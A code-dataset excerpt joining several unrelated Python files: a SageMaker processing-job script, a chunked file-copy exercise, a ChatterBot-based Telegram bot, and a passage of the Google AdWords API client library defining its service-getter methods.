        # Delegate verification to the first spec in the chain.
        return self.__specs[0].verify_docker(docker)
    @property
    def specs(self):
        """List of joined and ordered :term:`specs<spec>`"""
        return self.__specs
    @property
    def state(self):
        # Ready only when every member spec is ready.
        return all(spec.state for spec in self.__specs)
    @property
    def factor(self):
        return self.__factor
    @property
    def steps(self):
        return self.__steps
| StarcoderdataPython |
3328326 | <filename>aws/production_experiment/preprocess/run_processing_job.py
"""
runs script train_val_test_split on an ec2 instance as a sagemaker processing job
"""
from sagemaker.processing import ScriptProcessor, ProcessingInput, ProcessingOutput
import sagemaker
import boto3
## locations and vars
BUCKET = sagemaker.Session().default_bucket()
INPUT_FOLDER = 'stock-data-raw-csv'
OUTPUT_FOLDER = 'DEMO-xgboost-as-a-built-in-algo'
ROLE_ARN = sagemaker.get_execution_role()
## image uri code
ACCOUNT_ID = boto3.client('sts').get_caller_identity().get('Account')
REGION = boto3.Session().region_name
ECR_REPOSITORY = 'sagemaker-processing-container'
TAG = ':latest'
IMAGE_URI = '{}.dkr.ecr.{}.amazonaws.com/{}'.format(ACCOUNT_ID, REGION, ECR_REPOSITORY + TAG)
## call processing job
script_processor = ScriptProcessor(command=['python3'],
image_uri=IMAGE_URI,
role=ROLE_ARN,
instance_count=1,
instance_type='ml.m5.xlarge')
script_processor.run(code='train_val_test_split.py',
inputs=[ProcessingInput(
source=f's3://{BUCKET}/{INPUT_FOLDER}/',
destination='/opt/ml/processing/input')],
outputs=[ProcessingOutput(source='/opt/ml/processing/output/train',
destination=f's3://{BUCKET}/{OUTPUT_FOLDER}/train'),
ProcessingOutput(source='/opt/ml/processing/output/validation',
destination=f's3://{BUCKET}/{OUTPUT_FOLDER}/validation'),
ProcessingOutput(source='/opt/ml/processing/output/test',
destination=f's3://{BUCKET}/{OUTPUT_FOLDER}/test')])
| StarcoderdataPython |
3292846 | """
Key code !!
Exercise 4: assume there is an image timg.jfif in the current folder.
Write a function that takes the file name as input and, when executed,
copies the file into the home directory.
Note: the file may be large, so reading it all at once is not allowed.
Hint: read content from the original file and write it into the new file,
chunk by chunk.
"""
def copy(filename):
    """
    Copy ``filename`` into /home/tarena/ in fixed-size chunks.

    The file is streamed 1 KiB at a time so arbitrarily large files can be
    copied without loading them fully into memory.

    :param filename: the file to copy
    """
    # ``with`` guarantees both handles are closed even if a read/write
    # raises (the original leaked them on error).
    with open(filename, 'rb') as src, \
            open("/home/tarena/" + filename, 'wb') as dst:
        # Read and write side by side until the source is exhausted.
        while True:
            data = src.read(1024)
            # An empty read means end of file.
            if not data:
                break
            dst.write(data)
copy("timg.jfif") | StarcoderdataPython |
3333272 | # Setting up Chatterbot
import os
import json
import random
import dateutil.parser
from chatterbot import ChatBot
from chatterbot.trainers import ListTrainer
# Train the bot
# ChatBot persists learned statements in the SQL database addressed by the
# DATABASE_URL environment variable.
english_bot = ChatBot("English Bot",
                      storage_adapter="chatterbot.storage.SQLStorageAdapter",
                      database_uri=os.environ.get("DATABASE_URL"))
# Setting telegram things
# BOT_TOKEN is the Telegram bot API token.
tg_token = os.environ.get("BOT_TOKEN")
import logging
from telegram.ext import CommandHandler, MessageHandler, Filters, Updater
updater = Updater(token=tg_token)
dispatcher = updater.dispatcher
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)
def start(bot, update):
    """Handle the /start command by sending a greeting."""
    bot.send_message(chat_id=update.message.chat_id, text="Olá :)")
start_handler = CommandHandler('start', start)
dispatcher.add_handler(start_handler)
def reply(bot, update):
    """Handle an incoming text message.

    When the message replies to another message, the (original, reply) pair
    is fed to the trainer so the bot learns from real conversations. The bot
    answers only sometimes: with 15% probability, when its name appears in
    the text, or when the message is a direct reply to the bot itself.
    """
    userText = str(update.message.text)
    botName = bot.name
    is_reply_to_bot = False
    if update.message.reply_to_message is not None:
        # Train message responses
        train_data = [update.message.reply_to_message.text, update.message.text]
        list_trainer = ListTrainer(english_bot)
        list_trainer.train(train_data)
        is_reply_to_bot = update.message.reply_to_message.from_user.username == bot.username
    answer = str(english_bot.get_response(userText))
    # TODO: Move answer probability to a config file
    if random.random() <= 0.15 or botName in userText or is_reply_to_bot:
        bot.send_message(chat_id=update.message.chat_id, text=answer)
reply_handler = MessageHandler(Filters.text, reply)
dispatcher.add_handler(reply_handler)
def train(bot, update):
    """Train the bot from an uploaded Telegram chat-export JSON document.

    Messages are replayed in order: explicit reply pairs are trained as
    (original, reply), and runs of messages separated by gaps of four hours
    or more are trained as separate conversations.
    """
    file = bot.getFile(update.message.document.file_id)
    rawData = file.download_as_bytearray()
    data = rawData.decode('utf8')
    messages = json.loads(data)
    train_data = []
    list_trainer = ListTrainer(english_bot)
    last_date = None
    message_dict = dict()
    for message in messages["messages"]:
        # Telegram exports store formatted messages as lists; only plain
        # strings are usable. The old ``message["text"] is str`` compared a
        # value against the type object and was always False, so nothing
        # was ever collected.
        if isinstance(message["text"], str):
            train_data.append(message["text"])
            message_dict[message["id"]] = message["text"]
            if "reply_to_message_id" in message and message["reply_to_message_id"] in message_dict:
                prev_message = message_dict[message["reply_to_message_id"]]
                pair = [prev_message, message["text"]]
                list_trainer.train(pair)
        date = dateutil.parser.parse(message["date"])
        if last_date is not None:
            diff = date - last_date
            # total_seconds() counts the whole gap; ``diff.seconds`` ignored
            # the days component and missed multi-day gaps.
            if diff.total_seconds() >= 60 * 60 * 4:
                list_trainer.train(train_data)
                train_data = []
        last_date = date
    # Flush the trailing conversation that the loop never trained.
    if train_data:
        list_trainer.train(train_data)
train_handler = MessageHandler(Filters.document, train)
dispatcher.add_handler(train_handler)
def setup_webhook(updater, token):
    """Start the Telegram webhook listener and register its public URL.

    Reads WEBHOOK (public base URL) and PORT (default 8443) from the
    environment; the bot token doubles as the secret URL path.
    """
    public_base = os.environ.get('WEBHOOK')
    listen_port = int(os.environ.get('PORT', '8443'))
    updater.start_webhook(listen="0.0.0.0",
                          port=listen_port,
                          url_path=token)
    updater.bot.set_webhook(public_base + token)
setup_webhook(updater, tg_token)
updater.idle()
| StarcoderdataPython |
49347 | <gh_stars>1-10
#!/usr/bin/python
#
# Copyright 2010 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Interface for accessing all other services."""
__author__ = '<EMAIL> (<NAME>)'
import os
import re
import thread
import time
from adspygoogle.adwords import AdWordsSanityCheck
from adspygoogle.adwords import AUTH_TOKEN_SERVICE
from adspygoogle.adwords import DEFAULT_API_VERSION
from adspygoogle.adwords import LIB_SHORT_NAME
from adspygoogle.adwords import LIB_SIG
from adspygoogle.adwords import REQUIRED_SOAP_HEADERS
from adspygoogle.adwords.AdWordsErrors import AdWordsError
from adspygoogle.adwords.GenericAdWordsService import GenericAdWordsService
from adspygoogle.adwords.ReportDownloader import ReportDownloader
from adspygoogle.common import SanityCheck
from adspygoogle.common import Utils
from adspygoogle.common.Client import Client
from adspygoogle.common.Errors import AuthTokenError
from adspygoogle.common.Errors import ValidationError
from adspygoogle.common.Logger import Logger
class AdWordsClient(Client):
  """Provides entry point to all web services.
  Allows instantiation of all AdWords API web services.
  """
  # File names of the pickles that persist auth headers and configuration.
  auth_pkl_name = 'adwords_api_auth.pkl'
  config_pkl_name = 'adwords_api_config.pkl'
  def __init__(self, headers=None, config=None, path=None,
               login_token=None, login_captcha=None):
    """Inits AdWordsClient.
    Args:
      [optional]
      headers: dict Object with populated authentication credentials.
      config: dict Object with client configuration values.
      path: str Relative or absolute path to home directory (i.e. location of
            pickles and logs/).
      login_token: str Token representing the specific CAPTCHA challenge.
      login_captcha: str String entered by the user as an answer to a CAPTCHA
                     challenge.
    Example:
      headers = {
        'email': '<EMAIL>',
        'password': '<PASSWORD>',
        'authToken': '...',
        'clientCustomerId': '1234567890',
        'userAgent': 'GoogleTest',
        'developerToken': '<EMAIL>++<PASSWORD>',
        'validateOnly': 'n',
        'partialFailure': 'n',
        'oauth_credentials': {
          'oauth_consumer_key': ...,
          'oauth_consumer_secret': ...,
          'oauth_token': ...,
          'oauth_token_secret': ...
        },
        'oauth2credentials': 'See use_oauth2.py'.
      }
      config = {
        'home': '/path/to/home',
        'log_home': '/path/to/logs/home',
        'proxy': 'http://example.com:8080',
        'xml_parser': 1, # PYXML = 1, ELEMENTREE = 2
        'debug': 'n',
        'raw_debug': 'n',
        'xml_log': 'y',
        'request_log': 'y',
        'raw_response': 'n',
        'strict': 'y',
        'pretty_xml': 'y',
        'compress': 'y',
        'access': ''
      }
      path = '/path/to/home'
    """
    super(AdWordsClient, self).__init__(headers, config, path)
    self.__lock = thread.allocate_lock()
    self.__loc = None
    if path is not None:
      # Update absolute path for a given instance of AdWordsClient, based on
      # provided relative path.
      if os.path.isabs(path):
        AdWordsClient.home = path
      else:
        # NOTE(api.sgrinberg): Keep first parameter of join() as os.getcwd(),
        # do not change it to AdWordsClient.home. Otherwise, may break when
        # multiple instances of AdWordsClient exist during program run.
        AdWordsClient.home = os.path.join(os.getcwd(), path)
      # If pickles don't exist at given location, default to "~".
      if (not headers and not config and
          (not os.path.exists(os.path.join(AdWordsClient.home,
                                           AdWordsClient.auth_pkl_name)) or
           not os.path.exists(os.path.join(AdWordsClient.home,
                                           AdWordsClient.config_pkl_name)))):
        AdWordsClient.home = os.path.expanduser('~')
    else:
      AdWordsClient.home = os.path.expanduser('~')
    # Update location for both pickles.
    AdWordsClient.auth_pkl = os.path.join(AdWordsClient.home,
                                          AdWordsClient.auth_pkl_name)
    AdWordsClient.config_pkl = os.path.join(AdWordsClient.home,
                                            AdWordsClient.config_pkl_name)
    # Only load from the pickle if config wasn't specified.
    self._config = config or self.__LoadConfigValues()
    self._config = self.__SetMissingDefaultConfigValues(self._config)
    self._config['home'] = AdWordsClient.home
    # Validate XML parser to use.
    SanityCheck.ValidateConfigXmlParser(self._config['xml_parser'])
    # Initialize units and operations for current instance of AdWordsClient
    # object (using list to take advantage of Python's pass-by-reference).
    self._config['units'] = [0]
    self._config['operations'] = [0]
    self._config['last_units'] = [0]
    self._config['last_operations'] = [0]
    # Only load from the pickle if 'headers' wasn't specified.
    if headers is None:
      self._headers = self.__LoadAuthCredentials()
    else:
      if Utils.BoolTypeConvert(self._config['strict']):
        SanityCheck.ValidateRequiredHeaders(headers, REQUIRED_SOAP_HEADERS)
      self._headers = headers
    # Internally, store user agent as 'userAgent'.
    if 'useragent' in self._headers:
      self._headers['userAgent'] = self._headers['useragent']
      self._headers = Utils.UnLoadDictKeys(self._headers, ['useragent'])
      if Utils.BoolTypeConvert(self._config['strict']):
        SanityCheck.ValidateRequiredHeaders(self._headers,
                                            REQUIRED_SOAP_HEADERS)
    # Load validateOnly header, if one was set.
    if 'validateOnly' in self._headers:
      self._headers['validateOnly'] = str(Utils.BoolTypeConvert(
          self._headers['validateOnly'])).lower()
    # Load partialFailure header, if one was set.
    if 'partialFailure' in self._headers:
      self._headers['partialFailure'] = str(Utils.BoolTypeConvert(
          self._headers['partialFailure'])).lower()
    # Load/set authentication token. Exactly one of authToken, OAuth
    # credentials, or email+password must be available.
    if self._headers.get('authToken'):
      # If they have a non-empty authToken, set the epoch and skip the rest.
      self._config['auth_token_epoch'] = time.time()
    elif (self._headers.get('oauth_credentials') or
          self._headers.get('oauth2credentials')):
      # If they have oauth_credentials, that's also fine.
      pass
    elif (self._headers.get('email') and self._headers.get('password')
          and not self._headers.get('authToken')):
      # If they have a non-empty email and password but no or empty authToken,
      # generate an authToken.
      try:
        self._headers['authToken'] = Utils.GetAuthToken(
            self._headers['email'], self._headers['password'],
            AUTH_TOKEN_SERVICE, LIB_SIG, self._config['proxy'], login_token,
            login_captcha)
        self._config['auth_token_epoch'] = time.time()
      except AuthTokenError, e:
        # We would end up here if non-valid Google Account's credentials were
        # specified.
        raise ValidationError('Was not able to obtain an AuthToken for '
                              'provided email and password, see root_cause.', e)
    else:
      # We need either oauth_credentials OR authToken.
      raise ValidationError('Authentication data is missing.')
    # Insert library's signature into user agent.
    if self._headers['userAgent'].rfind(LIB_SIG) == -1:
      # Make sure library name shows up only once.
      if self._headers['userAgent'].rfind(LIB_SHORT_NAME) > -1:
        pattern = re.compile('.*' + LIB_SHORT_NAME + '.*?\|')
        self._headers['userAgent'] = pattern.sub(
            '', self._headers['userAgent'], 1)
      self._headers['userAgent'] = (
          '%s%s' % (self._headers['userAgent'], LIB_SIG))
    self.__is_mcc = False
    # Initialize logger.
    self.__logger = Logger(LIB_SIG, self._config['log_home'])
  def __LoadAuthCredentials(self):
    """Load existing authentication credentials from adwords_api_auth.pkl.
    Returns:
      dict Dictionary object with populated authentication credentials.
    """
    return super(AdWordsClient, self)._LoadAuthCredentials()
  def __WriteUpdatedAuthValue(self, key, new_value):
    """Write updated authentication value for a key in adwords_api_auth.pkl.
    Args:
      key: str Key to update.
      new_value: str New value to update the key with.
    """
    super(AdWordsClient, self)._WriteUpdatedAuthValue(key, new_value)
  def __LoadConfigValues(self):
    """Load existing configuration values from adwords_api_config.pkl.
    Returns:
      dict Dictionary object with populated configuration values.
    """
    return super(AdWordsClient, self)._LoadConfigValues()
  def __SetMissingDefaultConfigValues(self, config=None):
    """Set default configuration values for missing elements in the config dict.
    Args:
      config: dict Object with client configuration values.
    Returns:
      dict A config dictionary with default values set.
    """
    if config is None: config = {}
    config = super(AdWordsClient, self)._SetMissingDefaultConfigValues(config)
    default_config = {
        'home': AdWordsClient.home,
        'log_home': os.path.join(AdWordsClient.home, 'logs')
    }
    for key in default_config:
      if key not in config:
        config[key] = default_config[key]
    return config
  # The unit/operation counters below live in single-element lists (set up in
  # __init__) so that service objects can mutate them in place.
  def GetUnits(self):
    """Return number of API units consumed by current instance of AdWordsClient
    object.
    Returns:
      int Number of API units.
    """
    return self._config['units'][0]
  def GetOperations(self):
    """Return number of API ops performed by current instance of AdWordsClient
    object.
    Returns:
      int Number of API operations.
    """
    return self._config['operations'][0]
  def GetLastUnits(self):
    """Return number of API units consumed by last API call.
    Returns:
      int Number of API units.
    """
    return self._config['last_units'][0]
  def GetLastOperations(self):
    """Return number of API ops performed by last API call.
    Returns:
      int Number of API operations.
    """
    return self._config['last_operations'][0]
  def UseMcc(self, state):
    """Choose to make an API request against MCC account or a sub-account.
    Args:
      state: bool State of the API request, whether to use MCC.
    """
    self.__is_mcc = False
    if state:
      self.__is_mcc = True
  def __GetUseMcc(self):
    """Return current state of the API request.
    Returns:
      bool State of the API request, whether to use MCC.
    """
    return self.__is_mcc
  def __SetUseMcc(self, state):
    """Chooses to make an API request against MCC account or a sub-account.
    Args:
      state: bool State of the API request, whether to use MCC.
    """
    self.__is_mcc = state
  use_mcc = property(__GetUseMcc, __SetUseMcc)
  def SetClientCustomerId(self, client_customer_id):
    """Temporarily change client customer id for a given AdWordsClient instance.
    Args:
      client_customer_id: str New client customer id to use.
    """
    if ('clientCustomerId' not in self._headers or
        self._headers['clientCustomerId'] != client_customer_id):
      self._headers['clientCustomerId'] = client_customer_id
  def __GetValidateOnly(self):
    """Return current state of the validation mode.
    Returns:
      bool State of the validation mode.
    """
    return self._headers['validateOnly']
  def __SetValidateOnly(self, value):
    """Temporarily change validation mode for a given AdWordsClient instance.
    Args:
      value: mixed New state of the validation mode using BoolTypeConvert.
    """
    self._headers['validateOnly'] = str(Utils.BoolTypeConvert(value)).lower()
  validate_only = property(__GetValidateOnly, __SetValidateOnly)
  def __GetPartialFailure(self):
    """Return current state of the partial failure mode.
    Returns:
      bool State of the partial failure mode.
    """
    return self._headers['partialFailure']
  def __SetPartialFailure(self, value):
    """Temporarily change partial failure mode for a given AdWordsClient
    instance.
    Args:
      value: mixed New state of the partial failure mode using BoolTypeConvert.
    """
    self._headers['partialFailure'] = str(Utils.BoolTypeConvert(value)).lower()
  partial_failure = property(__GetPartialFailure, __SetPartialFailure)
  def __GetAuthCredentialsForAccessLevel(self):
    """Return auth credentials based on the access level of the request.
    Request can have an MCC level access or a sub account level access.
    Returns:
      dict Authentiaction credentials.
    """
    old_headers = self.GetAuthCredentials()
    new_headers = {}
    is_mcc = self.__is_mcc
    # Python 2 dict iteration (iteritems); copies every header, but for
    # MCC-level requests made with ClientLogin ('email' present) the
    # clientCustomerId is cleared so the call targets the MCC itself.
    for key, value in old_headers.iteritems():
      new_headers[key] = value
      if key == 'clientCustomerId':
        if is_mcc and 'email' in old_headers:
          new_headers[key] = None
    return new_headers
  def CallRawMethod(self, soap_message, url, server, http_proxy):
    """Call API method directly, using raw SOAP message.
    For API calls performed with this method, outgoing data is not run through
    library's validation logic.
    Args:
      soap_message: str SOAP XML message.
      url: str URL of the API service for the method to call.
      server: str API server to access for this API call.
      http_proxy: str HTTP proxy to use for this API call.
    Returns:
      tuple Response from the API method (SOAP XML response message).
    """
    # The last URL path segment names the service, e.g.
    # '.../CampaignService' -> 'CampaignService' -> GetCampaignService().
    service_name = url.split('/')[-1]
    service = getattr(self, 'Get' + service_name)(server=server,
                                                  http_proxy=http_proxy)
    return service.CallRawMethod(soap_message)
def GetAdExtensionOverrideService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in AdExtensionOverrideService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of AdExtensionOverrideService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'AdExtensionOverrideService')
def GetAdGroupAdService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in AdGroupAdService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of AdGroupAdService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'AdGroupAdService')
def GetAdGroupCriterionService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in AdGroupCriterionService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of AdGroupCriterionService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'AdGroupCriterionService')
def GetAdGroupService(self, server='https://adwords.google.com',
version=None, http_proxy=None):
"""Call API method in AdGroupService.
Args:
[optional]
server: str API server to access for this API call. Possible
values are: 'https://adwords.google.com' for live site and
'https://sandbox.google.com' or
'https://adwords-sandbox.google.com' for sandbox. The default
behavior is to access live site.
version: str API version to use.
http_proxy: str HTTP proxy to use.
Returns:
GenericAdWordsService New instance of AdGroupService object.
"""
headers = self.__GetAuthCredentialsForAccessLevel()
if version is None:
version = DEFAULT_API_VERSION
if Utils.BoolTypeConvert(self._config['strict']):
AdWordsSanityCheck.ValidateServer(server, version)
# Load additional configuration data.
op_config = {
'server': server,
'version': version,
'group': 'cm',
'default_group': 'cm',
'http_proxy': http_proxy
}
return GenericAdWordsService(headers, self._config, op_config, self.__lock,
self.__logger, 'AdGroupService')
def GetAdParamService(self, server='https://adwords.google.com',
                      version=None, http_proxy=None):
    """Return a service client for the AdWords AdParamService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to AdParamService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # Per-call configuration handed to the generic service wrapper.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'cm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger, 'AdParamService')
def GetAlertService(self, server='https://adwords.google.com', version=None,
                    http_proxy=None):
    """Return a service client for the AdWords AlertService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to AlertService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # AlertService lives in the 'mcm' URL group rather than the default 'cm'.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'mcm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger, 'AlertService')
def GetBidLandscapeService(self, server='https://adwords.google.com',
                           version=None, http_proxy=None):
    """Return a service client for the AdWords BidLandscapeService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to BidLandscapeService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # Per-call configuration handed to the generic service wrapper.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'cm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger,
                                 'BidLandscapeService')
def GetBudgetOrderService(self, server='https://adwords.google.com',
                          version=None, http_proxy=None):
    """Return a service client for the AdWords BudgetOrderService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to BudgetOrderService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # BudgetOrderService is the one service in the 'billing' URL group.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'billing',
        'default_group': 'billing',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger,
                                 'BudgetOrderService')
def GetBulkMutateJobService(self, server='https://adwords.google.com',
                            version=None, http_proxy=None):
    """Return a service client for the AdWords BulkMutateJobService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to BulkMutateJobService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # Per-call configuration handed to the generic service wrapper.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'cm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger,
                                 'BulkMutateJobService')
def GetMutateJobService(self, server='https://adwords.google.com',
                        version=None, http_proxy=None):
    """Return a service client for the AdWords MutateJobService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to MutateJobService.
    """
    # NOTE: the original docstring claimed a BulkMutateJobService instance
    # is returned; this method builds a MutateJobService client.
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # Per-call configuration handed to the generic service wrapper.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'cm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger,
                                 'MutateJobService')
def GetCampaignAdExtensionService(self, server='https://adwords.google.com',
                                  version=None, http_proxy=None):
    """Return a service client for the AdWords CampaignAdExtensionService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to CampaignAdExtensionService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # Per-call configuration handed to the generic service wrapper.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'cm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger,
                                 'CampaignAdExtensionService')
def GetCampaignCriterionService(self, server='https://adwords.google.com',
                                version=None, http_proxy=None):
    """Return a service client for the AdWords CampaignCriterionService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to CampaignCriterionService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # Per-call configuration handed to the generic service wrapper.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'cm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger,
                                 'CampaignCriterionService')
def GetCampaignService(self, server='https://adwords.google.com',
                       version=None, http_proxy=None):
    """Return a service client for the AdWords CampaignService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to CampaignService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # Per-call configuration handed to the generic service wrapper.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'cm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger, 'CampaignService')
def GetCampaignTargetService(self, server='https://adwords.google.com',
                             version=None, http_proxy=None):
    """Return a service client for the AdWords CampaignTargetService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to CampaignTargetService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
      # This service exists only in some API versions; check in strict mode.
      AdWordsSanityCheck.ValidateService('CampaignTargetService', api_version)
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'cm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger,
                                 'CampaignTargetService')
def GetCreateAccountService(self, server='https://adwords.google.com',
                            version=None, http_proxy=None):
    """Return a service client for the AdWords CreateAccountService.

    Args:
      server: str API server to access. Defaults to the live site; use
